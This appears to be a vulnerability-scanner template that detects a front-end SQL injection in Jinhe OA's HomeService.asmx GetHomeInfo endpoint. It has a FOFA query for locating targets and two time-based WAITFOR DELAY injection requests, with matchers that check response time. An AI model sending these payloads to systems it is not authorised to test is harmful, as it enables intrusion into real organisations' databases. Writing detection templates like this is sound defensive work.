## id: VEID-2024-0106
## name: 金和OA_HomeService.asmxSQL注入
## author: hack007x
## severity: high
## tags: veid,sql,veid2024
## description:金和OA前台SQL注入
## fofa-query: app="金和网络-金和OA"
## verification: true



GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}


#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 5
#@ matcher: status_code == 200

---

GET /c6/jhsoft.mobileapp/AndroidSevices/HomeService.asmx/GetHomeInfo?userID=1'%3b+WAITFOR%20DELAY%20%270:0:8%27-- HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ timeout: 20
#@ condition: and
#@ matcher: response_time >= 8
#@ matcher: status_code == 200



# @VEIL-STAMP: 606d5e53e683b06c58d47cba3a921c37e4e8cf5cf16401db331c9b58f0b76477
